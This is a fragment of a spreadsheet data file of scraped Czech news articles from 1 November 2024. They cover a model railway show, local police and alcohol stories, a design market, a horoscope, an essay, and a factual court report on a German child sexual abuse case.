    <t>Pozor, jede vlak! V Trutnově vmáčkli dvacet nádraží do jedné tělocvičny</t>
  </si>
  <si>
    <t>Pozor, jede vlak! V Trutnově vmáčkli dvacet nádraží do jedné tělocvičny „Některé modely jsou věrnými kopiemi skutečných nádraží nebo tratí. Jiné sice vznikly jako fikce, ale autoři kolejišť se nechali skutečností inspirovat,“ vysvětluje Jiří Novotný , předseda Klubu železničních modelářů v Trutnově , který mezinárodní výstavu společně se Střediskem volného času pořádá. Tahákem jsou například kořenovská zubačka, saské městečko s tramvajemi nebo miniaturní modely v lahvích. „K vidění jsou vláčky všech modelových velikostí a rozměrů. Nejmenší vláčky mají asi dva centimetry, největší i víc než třicet centimetrů,“ říká Novotný . Krkonoše Některá kolejiště jsou hotová, na dalších se ale ještě evidentně pracuje. Jezdí po nich sice vláčky, ale zbývá dokončit například krajinu, stavby a další detaily. „U některých je to práce na roky. Příkladem je naše kolejiště ve tvaru písmene L o velikosti 6 krát 9 metrů,“ upozorňuje Novotný . K vidění je dvacítka kolejišť od stovky modelářů. Kromě jezdících vláčků jsou na výstavě ve vitrínách vystaveny desítky většinou ručně vytvořených modelů. Například zakladatel trutnovského modelářského klubu Jiří Beran vystavil soupravu dvanácti vagonů s logem a obrázky pivovaru Krakonoš. „Jsou to chladírenské vozy Lp, které přepravovaly z trutnovského nádraží nejen pivo ,“ říká. play_fill Krkonoše V tělocvičně jsou rovněž prodejní stánky se železničářským zbožím. Čtyřdenní modelářská výstava patří už dlouhá léta mezi největší trutnovské expozice. „Například loni ji navštívily tři tisíce lidí,“ dodává Jiří Novotný . Začala včera, přístupná je ještě další tři dny. V pátek a sobotu je otevřená od 9.30 do 18 hodin, v neděli od 9.30 do 16 hodin. Vstupné je 100 korun pro dospělé, 50 korun pro děti. Natálie Otáhalová, Walter Elschek &amp;amp; Anna Elschek Nemčoková tančí v Uffu. | Video: Deník/ Pavel Cajthaml Autor: Pavel Cajthaml Autor person Pavel Cajthaml Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>6720</t>
  </si>
  <si>
    <t>3640</t>
  </si>
  <si>
    <t>20241101_329_3242887728_5e999582d1c9f0b53c5f.html</t>
  </si>
  <si>
    <t>5e999582d1c9f0b53c5f</t>
  </si>
  <si>
    <t>Strážníci v Brně se nestačili divit. Muž nadýchal tolik promile, že tester s tím měl problém</t>
  </si>
  <si>
    <t>Strážníci v Brně se nestačili divit. Muž nadýchal tolik promile, že tester s tím měl problém Čtyřiapadesátiletý muž v brněnských Řečkovicích nadýchal 5,38 promile, což už je dávka alkoholu , která může být smrtelná. Strážníkům při prvotním měření nestačilo ani rozpětí testeru na alkohol . V tiskové zprávě o tom v pátek informoval mluvčí strážníků Jakub Ghanem. Hlídka strážníků přijela muže zkontrolovat do tramvajové smyčky v Řečkovicích ve čtvrtek v poledne po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně opilý. Měla obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. „Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile,“ uvedl mluvčí. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkoholtesteru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Za hranici, při které hrozí upadnutí do bezvědomí a smrt, je považována hodnota čtyř promile. Někteří lidé jsou schopni snášet alkohol výrazně lépe. Příkladem je traktorista Milan Čurda , kterého před lety zadrželi policisté za volantem fekálního vozu, když nadýchal osm promile alkoholu . V roce 2018 lékaři ošetřovali houbaře z Ostravska se zlomeným kotníkem, který měl v krvi dokonce 8,83 promile alkoholu . Za světového rekordmana je považován Polák, který po oslavě s kamarády nadýchal 12,3 promile. Zdravotníci si muže v Brně převzali do své péče a po ošetření ho odvezli do nemocnice. Je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do 20 000 korun. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20241101_33_3264658407_992a62de1231ceb7a60d.html</t>
  </si>
  <si>
    <t>992a62de1231ceb7a60d</t>
  </si>
  <si>
    <t>Mladiství pili ve Znojmě alkohol i tam, kde se nesmí 1. 11. 2024 Božena Rytířová Jihomoravský kraj, KRIMI ilustrační foto: MP Znojmo ZNOJMO – Minulý pátek proběhla společná akce Policie ČR a Městské policie Znojmo zaměřená na problematiku konzumace alkoholických nápojů a jiných omamných látek rizikových věkových skupin a také na veřejný pořádek ve Znojmě . V e Znojmě minulý pátek s trážníci a policisté zkontrolovali sedm podniků, ve kterých se prodával a konzumoval alkohol . Zaměřili se také na problémové lokality včetně parků v oblasti centra města Znojma a okolo ulic Holandská a Sokolovská. Při společné akci bylo zjištěno 12 osob mladších 18 let, které byly pod vlivem alkoholu . Hlídky provedly i kontroly heren. Výsledky kontroly nebyly potěšující. Strážníci zjistili pět mladistvých dívek pod vlivem alkoholu . N ěkteré z dívek nadýchaly bezmála 1 promile alkoholu a byly předány do péče rodičů. „ T yto případy budou postoupeny příslušným sociálním odborům. Dále strážníci s policisty zaznamenali t ři porušení vyhlášky 6/2024 města Znojma , která zakazuje konzumaci alkoholu na vymezených veřejných prostranstvích. Tyto přestupky byly ohodnoceny pokutami v hodnotách 500 Kč, 1000 Kč a 5000 Kč,“ prozradila mluvčí znojemských strážníků Eva Veselá. Staňte se členy FB skupiny Život v Jihomoravském kraji a žádná zpráva z kraje vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. BRNO, HODONÍN, ZNOJMO – V 8. ročníku motivační soutěže Přívětivý úřad obcí s rozšířenou působností a úřadů městských částí Prahy, kterou organizuje Ministerstvo vnitra, získal […] Jihomoravský kraj BRNO, ZNOJMO – Policisté na jižní Moravě se zaměřují na kontroly zazimovaných rekreačních chat. Vzhledem k mnohdy špatně přístupnému terénu do akcí zapojují i služební […] Co se chystá Autor: Božena Rytířová Autor person Božena Rytířová Rubrika transition_slide Jihomoravský kraj</t>
  </si>
  <si>
    <t>20241101_330_3242842026_a7d92cc08551e51a1923.html</t>
  </si>
  <si>
    <t>a7d92cc08551e51a1923</t>
  </si>
  <si>
    <t>Jedenáctý LEMARKET přivítá 200 značek a umělců v budově bývalých elektrických podniků WPP Campus. Uskuteční se během dvou prosincových víkendů</t>
  </si>
  <si>
    <t>Jedenáctý LEMARKET přivítá 200 značek a umělců v budově bývalých elektrických podniků WPP Campus. Uskuteční se během dvou prosincových víkendů Redakce, 1.11.2024 Moderní tržiště LEMARKET, které představuje a podporuje českou tvorbu, vstoupilo do druhé dekády. V letošním roce zaplní o dvou víkendech 7. a 8. prosince a 14. a 15. prosince rekonstruovanou budovu WPP Campus u stanice metra Vltavská, do které se běžně veřejnost nedostane. V budově, která v roce 2021 získala ocenění Stavba roku, najdou návštěvníci nejen více než 200 lokálních značek, designérů a umělců, ale i prostor pro odpočinek a relaxaci. Součástí obou víkendů bude vedle gastro zóny a bohatého doprovodného programu i možnost profesionálního líčení, tetování a workshopy. LEMARKET pokračuje ve své misi objevovat a představovat to nejlepší z lokální tvorby. Každý ze dvou víkendů nabídne přes 100 pečlivě vybraných značek, přičemž pouze 30 z nich se bude oba termíny opakovat. „ Návštěvníci tak budou mít jedinečnou příležitost objevit během obou víkendů zcela nové tvůrce a značky jako jsou například Ententyky, Soolista, Nikola Zezulová, Michaela Lada, Artistka nebo Kayu. Zároveň jsme program obohatili o řadu služeb, které zpříjemní celkový zážitek z návštěvy. Ať už jde o tetovací salón nebo péče o krk, ruce a obličej se značkou Bioorganica," říká organizátorka Elena Janota. Oceněné prostory WPP Campus, dříve Orco Bubenská, jsou důvěrně známé tvůrčí komunitě. Mnoho značek zde v minulosti mělo své ateliéry a showroomy a LEMARKET sám v ní po několik let sídlil. Budova se s LEMARKETEM promění v designové tržiště s originální atmosférou. Citlivá rekonstrukce budovy zachovala řadu původních architektonických prvků, které vytváří jedinečné prostředí pro prezentaci současného designu. Mezi vystavovateli nebudou chybět etablované české značky jako je například udržitelná oděvní značka Weconcept, výrobci českých parfémů a vůní do interiérů Perfumed Prague a Oraculum a designéři a designérky jako jsou šperkařka Eliška Lhotská a Ela Chroust, výrobci kožených doplňků about leather nebo brýlařské studio Optiqua. Nejen ty doplní začínající tvůrci a přibližně desetina vystavovatelů přijede ze Slovenska . Novinkou letošního ročníku je rozšířená nabídka služeb pro návštěvníky. V prostorách marketu naleznou tetovací salon, relaxační zónu s masážemi od Biorganica zaměřenými na péči o krk, ruce a obličej, služby vizážistky s možností líčení a poradenství, a profesionální balení dárků. Významnou součástí je také nová dobročinná zóna, kde se zdarma představí charitativní projekty SPOLUŽIVOT, METRÁŽ a ELPIDA. O gastronomické zážitky se postará kurátorovaný výběr značek. Návštěvníci ochutnají vína od ALMA WINES, pečivo z pekárny La Forme, speciality od Sweet &amp;amp; Pepper Days, kávu od Onesip Coffee a Dvakratdva, japonské speciality Neko Onigirazu, sladkosti z pardubické cukrárny Epifany a osvěžující nápoje od Herbert Sirupy. Kulturní program, který bude moderovat Šimon Bilina , nabídne pestrý mix žánrů. Na pódiu se vystřídají Adam Vopička, Sbor ELPIDA, dětský sbor HLÁSKY a večerní atmosféru dokreslí DJ set. V programu bude také benefiční divadelní představení, kterým budou moc lidé podpořit vybraný charitativní projekt. LEMARKET se uskuteční během dvou prosincových víkendů (7. – 8. 12. a 14. – 15. 12.) v prostorách WPP Campus. Vstupné činí 150 Kč na den nebo 250 Kč na celý víkend. Děti do 15 let a senioři mají vstup zdarma. Autor: AliaWeb, spol. s r.o. || Tipy a triky</t>
  </si>
  <si>
    <t>383</t>
  </si>
  <si>
    <t>403</t>
  </si>
  <si>
    <t>20241101_331_3264902721_2e7650a50211979cecd1.html</t>
  </si>
  <si>
    <t>2e7650a50211979cecd1</t>
  </si>
  <si>
    <t>Když se pivo stane elixírem, víte, že jste na správné cestě</t>
  </si>
  <si>
    <t>Když se pivo stane elixírem, víte, že jste na správné cestě autor: Redakce Nezdrave.cz | 01.11.2024 | Chlast Kdo by si pomyslel, že pivo , jež je jiné než “to, co se pije večer po práci”, může mít také svoje mystické kouzlo? Dnešní článek se ponoří do fascinujícího světa alkoholických nápojů, které nejen že rozmazlují naše smysly, ale také obohacují naše životy o zážitky, které bychom dřív pokládali za čistou utopii. Každý milovník chlastu ví, že život je příliš krátký na to, abychom pili průměrné produkty, a tak se pojďme podívat na to, co svět piva a jiných nápojů přináší. Alchymie chlastu a jeho historie Historie piva sahá až do starověké Mezopotámie, kdy mělo toto zlaté moku takovou magickou moc, že dokonce sloužilo jako platidlo. Představte si, že místo bankovek jste na tržišti prohodili půllitr s nějakým chlapíkem na rohu a to byl váš způsob, jak nakoupit. Zní to jako sen? Možná je to lepší než dnešní kryptoměny. A teď si představte, jak by to vypadalo dnes – v módě by byly klobouky z plechovek, zatímco namísto platební karty byste vyndali špatně udělaný ručně malovaný džbán. Pivo jako platidlo má více než jen historickou zajímavost, ale i filozofii – spojuje lidi, dává jim prostor pro sdílení a těšení se ze života. Také se přiznejme, že chlast není jen o alkoholu . I když je pivo králem mezi nápoji, jeho variace a doplňky vytvářejí úžasné spektrum chutí. Kdo by si pomyslel, že by se z chlastu daly vytvořit pokrmy jako pivo -ragú nebo pivo -brownies? Ano, čtete správně! Pivo se stalo nejen součástí večírků, ale i gurmánských zážitků. Je to jako mít nejlepšího kamaráda, který vás vždy doprovodí na oslavy a pochybnou večeři, kdy zachráníte sebe a své hosty před hladomorem. Celebritní kategorie chlastu Může se zdát, že s postupem času se alkohol stává čím dál víc elitním zbožím. V současnosti už nestačí pouze popíjet s kamarády na terase. Je trendy mít vlastní značku vína nebo dokonce destilovat gin v malém objemu doma, dokud police při každém pohybu nezakolísá. Známí lidé jako George Clooney s jeho Casamigos nebo Ryan Reynolds s Aviation Gin nám ukazují, jak na tom celkově být. Ale ruku na srdce, kdo by potřeboval ikonické alkoholické nápoje, když si můžete otevřít plechovku s pivem a v létě si užívat chvíle s přáteli na pláži? Je skvělé mít skvělé jméno na lahvi, nicméně pravá magie se děje až v momentě, kdy spustíte party a otřete si ruce o spodek stolu. Přiznejme si, že alkohol se často spojuje s usměvavými vzpomínkami a vyšším než normálním množstvím zmatku. O tom svědčí i počet oblíbených historek, které se s každým oktávem večera stávají stále více zakrývanými. Něco, co začíná jako tropická pláž s mojitem v ruce, se může za pár hodin změnit na nářek nad rozbitým mobilním telefonem a loučením s batohem na outseatu, protože “ty jo, kdo to byl, že mě tam táhnul?”. Ale možná to k životu patří. A to, co opravdu dělá chlast tak výjimečným, je jeho schopnost proměňovat banalitu života na epické momenty. Vy budete paměťový balit snadno, když strávíte večer popíjením s přáteli a smíchem, zcela zapomenete na stres ze zaměstnání a krizi středního věku, která se chystá přijít. Takže buďte statečnými dobývateli kocoviny a pamatujte, že kvalitní pivo je jako skvělý přítel – podrží vás, když to nejvíc potřebujete. A konečně nezapomeňte, že alkohol je jako dobrý film – nezajímá vás konec, pokud si užíváte jízdu. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_332_3242823509_188b3a3b95fc429d66ee.html</t>
  </si>
  <si>
    <t>188b3a3b95fc429d66ee</t>
  </si>
  <si>
    <t>Miluje je jen pár lidí: Tato 2 znamení jsou téměř bez přátel. Patříte mezi ně?</t>
  </si>
  <si>
    <t>Miluje je jen pár lidí: Tato 2 znamení jsou téměř bez přátel. Patříte mezi ně? horoskop, noshp, předpověď, znamení zvěrokruhu Existují dvě znamení zvěrokruhu, která nemají zrovna moc široký okruh přátel. To první okolí odrazuje svou přehnanou kritičností, druhé naopak samotu upřednostňuje, aby se vyhnulo případnému zklamání. Třeba mezi ně patříte i vy. „Mezi zrozence, kteří mají přátel ze všech nejvíce patří Blíženci. Ti jsou úplnými společenskými motýlky, všechny znají a jsou hvězdou každé párty. Jejich vztahy bývají ale povrchní, naopak Váhy dokáží vybudovat velmi silná a upřímná kamarádství na život a na smrt. Pak tu máme ovšem znamení, která patří mezi solitéry. Vztahy s ostatními často nenavazují a mnohdy je to ani netrápí, protože mají pocit, že si vystačí sami,“ uvádí věštkyně Hana Matějková pro techsvět. Kozoroh Kozorozi patří mezi znamení, která jsou spíše introvertní. Dokáží se ve společnosti pobavit, předvést, ale není to jejich styl. Naopak, i když jsou ve středu dění, s největší pravděpodobností se už vidí doma na gauči s knihou v ruce. Kromě toho, že čas tráví právě ze všeho nejraději doma, jsou také nejraději sami. Mají jen málo přátel, protože jsou v oblasti vztahů poměrně nestálí a svůj okruh nejbližších lidí často obměňují. Kromě toho s nimi není úplně snadné vydržet. Samota může někdy bolet, zdroj: Shutterstock Trochu by se dalo říct, že káží vodu, ale pijí víno . Každému ve svém okolí dokáží naprosto perfektně poradit, říct, co a proč dělá špatně, sami sobě ale stejným metrem neměří. I proto mnohdy působí hádavě, přespříliš kriticky či tak, že se nad ostatní jakoby povyšují. To samé platí i při výběru partnera, na kterého mají často až nerealistické požadavky. P ři prvním zklamání pak mají tendence pálit mosty. Zkrátka a dobře – mnozí Kozorozi jsou sice milé, citlivé a romantické duše, zároveň však mají složitou povahu, která je těkavá a soudí druhé. K tomu navíc ještě většinou rychleji mluví, než myslí. „Nesmíme pak ani zapomenout na to, že mají Kozorozi často problém se omluvit nebo omluvu přijmout. Svým blízkým tak s oblibou vmetají do obličeje rány, které už měly být dávno zapomenuty a hlavně zahojeny,“ říká věštkyně Matějková. Vodnář Vodnář je opačným případem, má totiž velké charisma a lidi k sobě mnohdy až magneticky přitahuje. Nepřipouští si je ovšem k tělu. Existují dva typy Vodnářů. Ti, kteří se narodili ještě v lednu bývají komunikativnější a zvláště v mládí pak mívají doslova srdce na dlani. Věří v dobrotu lidstva, na své okolí však mohou působit zároveň velmi naivně. To odejde s prvním zklamáním, kdy se začnou uzavírat spíše do svého vnitřního světa, který mají opravdu bohatý. Zjistit, o čem přemýšlí nebo jaké jsou jejich skutečné pocity, bývá pak pro ostatní jen velmi těžké. Jakmile se totiž Vodnář jednou spálí, bude mít ohromné problémy začít znovu někdy někomu věřit. Ztracená důvěra může mít za následek kamenné srdce, zdroj: Shutterstock Naopak, Vodnář se bude z vlastní vůle okolí spíše stranit. Přestože bývají tato znamení v centru dění a strhávají na sebe často a s láskou pozornost, protože jsou to tak trochu exhibicionisté, jejich blízký okruh přátel tvoří často jen málo lidí. Rozhodně byste je napočítali na prstech jedné ruky. Zrozenci, kteří přišli na svět v únoru jako kdyby se už narodili se srdcem tak trochu z kamene. Ostatní si k tělu nepřipouští a přestože by třeba rádi svoje emoce vyjádřili a druhého patřičně ocenili, tak úplně jim to nejde. „Bojí se zklamání, mají tendence si lidi vykreslovat v těch nejlepších barvách. Jenže znáte to, jakmile někoho doopravdy poznáte, začnete na něm vidět chyby. To nezapadá do vodnářského vidění světa, které je snové a spíš jako z filmu. Tato znamení se lidem často vyhýbají záměrně, aby si udržela odstup – jak fyzický, tak i emoční,“ dodává vědma. [seznam-ads id="63251"] [seznam-ads id="63250"] [seznam-ads id="64854"] [seznam-ads id="64868"] Autor: Lucie Novotná Autor person Lucie Novotná Rubrika transition_slide Nejnovější zprávy</t>
  </si>
  <si>
    <t>19570</t>
  </si>
  <si>
    <t>22520</t>
  </si>
  <si>
    <t>20241101_333_3242827454_5cf883332ae2f0281d5b.html</t>
  </si>
  <si>
    <t>5cf883332ae2f0281d5b</t>
  </si>
  <si>
    <t>Co si člověk nepřičaruje, to nemá</t>
  </si>
  <si>
    <t>Co si člověk nepřičaruje, to nemá Kolika věcí jsme dosáhli vlastní pílí a prací a vlastní snahou - a kolik přání se nám splnilo jen díky tomu, že jsme si je pořád dokola opakovali? Věda se zabývá materiálními projevy života, ale jeho podstatu nezná. Jako když máme vlasy nebo lépe řečeno, ještě máme vlasy a teď si je barvíme, stříháme, ondulujeme, myjeme různými šampony, sušíme fény všech možných tvarů a velikostí s různou teplotou vzduchu, ondulujeme a dáváme na ně trvalou, barvíme pomocí peroxidových kysličníků, zamotáváme do dredů nebo je dokonce „prodlužujeme“, ale když je nemáme, je s jakýmikoliv experimenty konec. Dar života si jistě zaslouží, abychom s ním zacházeli opatrně. Z vesmírného hlediska může naše existence vypadat jako krátký bezvýznamný okamžik. Přesto si myslím, že není tak úplně jedno, jak s touto „chvílí“ naložíme, protože kvalitu svého života si většinou vytváříme sami svým správným či nesprávným chápáním věcí kolem nás. Už dávno jsem si poopravil tvrzení o tom, že každý má svou vlastní pravdu, a říkám, že pravda je jenom jedna, zatímco každý má svou vlastní lež. Je jedno, jestli je to lež milosrdná nebo ne, v každém případě znamená jakákoliv lež odklon od pravdy. Co takový odklon znamená, vidíme všude kolem sebe. Nejsou to jen války a ekologické katastrofy, ale i zbytečně nemocní, nešťastní a předčasně stárnoucí lidé. Co je vlastně ona pravda a jak ji můžeme poznat? Mnohokrát jsem slyšel otázku: „Jestli existuje Bůh, jak může dopustit, aby existovala všechna ta krutost a nespravedlnost, která je kolem nás?“ Což je celkem rozumná otázka, díky níž jsem usoudil, že kdyby tady jakýkoliv Všemohoucí, který by fandil normálním, slušným lidem, existoval, tak by už dávno zjednal pořádek, že bychom se nestačili divit. Kradeš zakázané ovoce? Tak mazej z ráje! Uděláš to znovu? Tak dostaneš pohlavek od pánaboha, až uděláš kotrmelec ve vzduchu. A nebylo by co řešit. Kdyby takový bůh neexistoval, tak bychom se určitě stále dokola ptali: „Jestli ještě existují lidé, kteří umí normálně myslet, jak mohou dopustit, aby krutý a prokazatelně psychopatický jedinec mohl ovládat životy milionů jiných lidí?“ Máme přece svobodnou vůli a můžeme se svým životem do velké míry nakládat, jak sami uvážíme. Možná myslíme a uvažujeme trochu jinak, když myslíme anonymně sami za sebe a jinak, když sedíme kolektivně v psychoterapeutickém kruhu kolem poradního ohně. Bohužel jsme přestali rozumět přírodě a přestali jsme chápat sami sebe. Začali jsme se spoléhat na racionální část svého rozumu a přestali jsme naslouchat pocitům a instinktům, které jsme odsunuli do oblasti temných a často i nevhodných pudů a negativních impulzů. Stačí si uvědomit, jak jsme se zachovali k daru sexuality, díky níž vůbec existujeme. Zkusme si představit, že původně byla logika a cit v našem mozku v rovnováze. Potom se s naším vědomím cosi stalo, ale rozhodně to nebyl pohlavek od pánaboha, spíše od nějakého psychopata a v myšlení začala převládat logika čili racionalita. Každá disharmonie na duševní úrovni se zákonitě časem projeví diskomfortem na fyzické úrovni. Ze světa lidí se stal svět mužů, z něhož se zdánlivě stává svět žen. Spíše je to ale svět mužsky myslících a uvažujících žen. Žebříček hodnot ovládla destruktivní technika, ničení přírody, války, nemoci, politika, ekonomika, neschopnost samostatně myslet, primitivní logika a touha, často i potřeba patřit k nějaké organizaci. Jakmile člověk přestal samostatně myslet a ztratil možnost rozhodovat sám za sebe, stal se členem stáda nemyslících tvorů. Je zajímavé, že to samé mínění máme o zvířatech, která svůj život končí na jatkách. Stejný osud však čeká i nás, když za sebe necháme mluvit kohokoli, kdo by jen stěží prošel pohovorem u psychiatra. Ať už je to politik, samozvaný spasitel nebo zakladatel jakékoliv svižné sekty. To všechno jsou lidé, kterým beztrestně dovolujeme, aby za nás mluvili v Kašpárkově divadle, kde svorně bok po boku hrajeme své životní role. Jeden můj známý, už starší člověk, velice rád řídil auto. Patřil k těm řidičům, co jezdí hlavně v sobotu a v neděli a při jízdě mívají na hlavě klobouk. Protože jezdil pomalu, jel obvykle v čele dlouhé kolony a když se to stávalo pravidelně, udělal z toho závěr, že ostatní v něm poznali zkušeného řidiče, jedoucího na spotřebu, a tak se rozhodli jet podle něho. Tento jev se stále dokola opakuje v různých modifikacích. Někdo zastává důležitý post, je přesvědčený o své nenahraditelnosti a užitečnosti, ale ve skutečnosti všechno jen brzdí a zdržuje. Spousta lidí žije svou funkcí a opájí se svou falešnou autoritou, která po odchodu ze zaměstnání mizí jak pára nad hrncem a zůstává jen nešťastník, který nerozumí světu. Často má pocit, že zmizela část jeho osobnosti. Punc neobvyklosti celé situaci dodávají radilové a žvanilkinové z ulice, když si začnou notovat, no vidíte, tady Venca, jak si myslel, že je celý život úspěšnej - a on teď nemá ani peníze na nájem, ten si to dovedl zařídit. Tak nějak jim nedochází, že když Venca pracoval, tak měl normální plat, zatímco, když má teď nějaký homeopatický důchod, jak je v těchto krajích zvykem, tak to k přežití rozhodně nestačí. Na umělých autoritách, kvetoucích na finančních náhodách přitom záleží, co budeme jíst, co budeme pít, na co se budeme smět dívat, jak dlouho budeme stát ve frontě na jídlo, co bude povoleno číst, co přitom budeme mít na sobě a kde a jak budeme bydlet. Na umělých autoritách stojí celý náš „moderní svět“ a celá naše budoucnost. Dítě, které je většinou počato jako naprosto dokonalý tvor, je od svého početí obklopeno dospělými. Ovlivňují jeho osud ještě předtím, než se narodilo. Rodič, který by často sám nutně potřeboval pomoc, se stane „bohem“, „vládcem“ začínajícího malého tvorečka. Stane se umělou autoritou. Zodpovědnost, kterou bychom měli mít sami za sebe, jsme přenechali jiným lidem. Z toho plyne i víra v jakéhosi mesiáše, vůdce, který se odněkud vynoří a vyřeší všechny naše problémy. Zapomněli jsme, že symbol onoho Spasitele, znamená naše vnitřní já. Stručně řečeno, jde o program harmonie, který je každému vrozený, ale zůstává potlačen, v latenci. Obvykle se začne alespoň na přechodnou dobu projevovat ve zvláštních stavech vědomí, což může nastat třeba při meditacích, ale také po požití drog nebo ve stavu extáze. Existuje nějaký návod, jak být šťastný a žít v souladu se svými touhami a přáními? Ano, pokud přestaneme hledat štěstí mimo přítomnost a když najdeme cestu ke svým nejniternějším pocitům a k podvědomí, kde je klíč ke správnému způsobu života. Jakmile najdeme cestu k sobě, najdeme ji i ke svým blízkým a k ostatním živým bytostem. Naše nálada by neměla být závislá na umělých náhražkách. Pro náš harmonický vztah přece není rozhodující, jestli budeme mít možnost cpát se sladkostmi, kouřit a pít alkohol nebo jestli naše sportovní družstvo postoupí do finále. Kolikrát jsme sami za sebe přestali toužit a realizovat své osobní plány? Proč? Mladým lidem se smějeme, že jsou naivní a mladí, nesnášíme je kvůli jejich nespoutanosti, rebelství bez příčiny a neuznávání autorit. Těšíme se, že jim někdo ustřihne nebo alespoň přistřihne křídla, ostříhá vlasy a pošlape iluze. Vyznáváme kult reality všedního dne. Kdysi jsem četl o muži, od něhož celá rodina odešla do sekty Řád Slunce. Po srdceryvné výpovědi o tom, jak ho opustila manželka a oba synové a jak jim později už nemohl pomoci, končil s tím, že by se měly zakázat pořady o ezoterice a parapsychologii. Tento člověk dokázal od sebe zapudit své nejbližší, a ještě se rozčiloval, že hledali jinde to, co jim on sám nedokázal dát. Největším lákadlem pro vstup do jakékoliv sekty jsou téměř vždy chybějící city a chybějící iracionalita doma, v rodině. Člověk málokdy utíká z prostředí, kde je spokojený. Na tohle pravidlo si vzpomeňte vždy, když uslyšíte, že nějaká žena v roli rafinované milenky odlákala muže od rodiny. Kdyby byl ten chlap v pohodě a spokojený, tak by ho ani ve snu nenapadlo, že by měl utíkat. Kam? A proč? Pokud ale není v roli rozmazlovaného manžela a musí žít ve stresu a v neutuchajících hádkách, odešel by okamžitě i v případě, kdyby mu někdo nabídl roční ubytování v levném pokojíku v béčkovém hotelu. Spokojeného chlapa od rodiny neodtáhnete ani párem volů a jako volové se většinou ukáží ti, kteří se o něco podobného snaží. Zakladatel pozitivního myšlení Prentice Mulford psal o existenci myšlenkového proudu věčné blaženosti, úspěchu, zdraví, krásy, štěstí, blahobytu, lásky a inspirace. Do tohoto proudu se nám podaří vstoupit, když uvolníme své myšlení a dostaneme jeho racionální a iracionální část do rovnováhy. Harmonický stav mysli se dnes popisuje jako rozšířené vědomí, do něhož se lidé snaží dostat pomocí umělých prostředků jako jsou drogy, holotropní dýchání, extatické tance, meditace, koncentrace, modlitba, askeze, tantra, satanismus či hledání hranic svých možností. Snaha o trvalé dosažení dimenze pravdy, však většině lidí chybí, protože k tomu by se skutečně museli od základu změnit a potom by už samozřejmě žádné umělé prostředky nepotřebovali. Naše společnost se dá charakterizovat jako společnost, která zbožňuje peníze a extrémní výkony. Pokud někdo nemá peníze, může se k nim dostat nejlépe tak, že se v něčem dopracuje k rekordním výsledkům. Výkon samozřejmě souvisí se sportem a bohužel právě díky snaze dosahovat stále vyšších a nesmyslnějších výkonů, přestává obzvláště profesionální sport být sportem, tedy něčím, pomocí čeho by se naše tělesné schránky mohly po dlouhá léta udržovat svěží, funkční a zdravé. V této, téměř holé větě se skrývá největší paradox našeho současného „moderního“ myšlení. Toužíme po nejvyšším výkonu, toužíme po dosažení jakéhokoliv rekordu, zlaté medaile, prvenství, označení „jednička“, „áčko“, vítěz, neporazitelný, nepřemožitelný, nejbohatší, nejsilnější, nejrychlejší… Ale pozor, za každým vrcholem je už jenom cesta dolů. Pokud bychom chtěli žít a bydlet na vrcholu, tak si asi budeme muset zvyknout na truchlivou samotu, protože moc přátel se k nám nedostane a zakládat někde na vrcholu skály nebo i kopce kolonii, město nebo stát, popřípadě národ není ta nejlepší myšlenka. Od toho jsou nížiny, i když je žádné extrémní a často bohužel i zbytečné výkony nezdobí. Nanejvýš tak v počtu záplav. Právě jsme se dostali ke slovnímu spojení „extrémní a zbytečný“ nebo také „extrémně zbytečný“. Je to jenom náhoda?</t>
  </si>
  <si>
    <t>20241101_334_3242826931_e08f570f46a714ee97ea.html</t>
  </si>
  <si>
    <t>e08f570f46a714ee97ea</t>
  </si>
  <si>
    <t>Otec v Německu oplodnil 12letou dceru, zjistilo se to v pátém měsíci. Nic si nepamatuji, tvrdí</t>
  </si>
  <si>
    <t>Otec v Německu oplodnil 12letou dceru, zjistilo se to v pátém měsíci. Nic si nepamatuji, tvrdí Že je dívka v pátém měsíci těhotenství, se zjistilo až na dětské klinice v Hesensku , kde byla přijata s bolestmi břicha. Podle testů DNA lékaři zjistili, že nenarozené dítě má patřit biologickému otci dvanáctileté oběti, píše německý deník Bild. Rodina se rozhodla pro potrat. K TÉMATU: Těhotná už v 10 letech: Španělský otčím znásilňoval dceru, když byla matka v práci Zdravotníci okamžitě kontaktovali německou policii a obviněný je od února ve vazbě. Čtyřicetiletý muž eritrejského původu měl svou dceru sexuálně zneužít loni 23. července, uvedla státní zástupkyně Daniela Zehrtová. V době zločinu žili oba v zařízení pro uprchlíky ve městě Friedberg , matka s dalšími členy rodiny dorazila později. Obžalovaný se nyní zodpovídá před hesenským soudem. Nic si nepamatuji, moc jsem toho vypil Muž se hájil, že zkonzumoval příliš alkoholu . Se svým známým podle výpovědi navštívil místní bar, vypil minimálně deset piv a zbytek večera si vůbec nepamatuje, uvádí regionální zpravodajský web Hessenschau. Otec se zároveň bránil, že se dívka o ničem z inkriminovaného večera nezmínila. Soud však namítl, že o požití alkoholu se obžalovaný nikdy předtím nezmínil. Místní deník zároveň podotýká, že zprvu odmítal dobrovolné podstoupení testů DNA. Proces s mužem bude pokračovat 8. listopadu. Dcera proti svému otci vypovídat nebude. V současnosti již nyní třináctiletá dívka se nachází v zařízení pro mládež, kde se vypořádává s traumatickým zážitkem. Podle dětské psycholožky, která ji má v péči, trpí disociativní poruchou a mívá výpadky vědomí. „Ptala jsem se jí, zda ví, jak se rodí děti. Řekla ‚ne‘,“ cituje Bild expertku zkoumající její duševní stav. MOHLO VÁM UNIKNOUT: Dívka se střelila do hlavy kvůli catfishingu. Ze záznamu volání na tísňovou linku mrazí</t>
  </si>
  <si>
    <t>20241101_335_3242826923_3bc7c9c6fa29ec313acc.html</t>
  </si>
  <si>
